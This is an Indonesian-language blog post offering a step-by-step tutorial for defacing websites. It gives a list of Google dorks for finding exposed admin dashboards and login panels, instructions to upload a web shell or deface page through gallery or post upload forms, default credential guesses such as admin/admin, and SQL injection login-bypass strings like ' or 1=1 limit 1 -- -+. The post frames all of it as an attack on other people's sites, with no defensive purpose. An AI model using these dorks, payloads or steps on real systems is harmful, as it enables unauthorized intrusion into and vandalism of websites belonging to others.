Tutorial Deface Admin Mistake.
Jumat, 13 Maret 2020
Tambah Komentar
Oke langsung aja tanpa basa basi cape saya ngetik:v
Dork:
-inurl:/admin/Dashboard.php "Gallery"
-inurl:/admin/Dashboard.php "Viewgallery"
-inurl:/admin/Dashboard.php "addgallery"
-inurl:/admin/Dashboard.php "galleryadd"
-inurl:/admin/Dashboard.php "Galleryview"
-inurl:/admin/Dashboard.php "News"
-inurl:/admin/Dashboard.php "AddNews"
-inurl:/admin/Dashboard.php "viewNews"
-inurl:/admin/Dashboard.php "artickel"
-intext:"username" /admin site:
-inintitle:"administrator" "login" "username" "password"
-inurl:/panel/login.php 'password' site:in
-inurl:/login.php intitle:'login panel' 'password'
-intext:/welcome/Dashboard.php
-intext:/Home/Dashboard.php
-inurl:/admin/Dashboard.php
-inurl:/panel/Dashboard.php
-inurl:/admin/dashboard.php site:in
-inurl:/panel/Dashboard.php
Step By Step :
1. Kalian dorking dengan Dork di atas.
2. Lalu pilih salah 1 target kalian yang kira kira nya vuln.
3. Nanti kalo web nya vuln maka kalian akan di bawa langsung ke Dashboard admin nya.
4. Cari tempat Up ada di gallery atau di add view page post dll cari cari aja tempat up.
5. Lalu Up shell jika web itu support ea:v Kalo kaga up shell. JSO aja sekalian:v
Note :Kalo kaga vuln cari web lain.
Kalo di suruh masukkin user dan pass masukkin seperti biasa nya kaya Bypass admin
Tebak tebak aja sih contoh.
User & Pass Default.
User: admin
Pass: admin
User: admin
Pass: pass
Bypass Admin.
User = '="or' Atau ' or 1=1 limit 1 -- -+
Pass = '="or' Atau ' or 1=1 limit 1 -- -+
Belum ada Komentar untuk " Tutorial Deface Admin Mistake."
Posting Komentar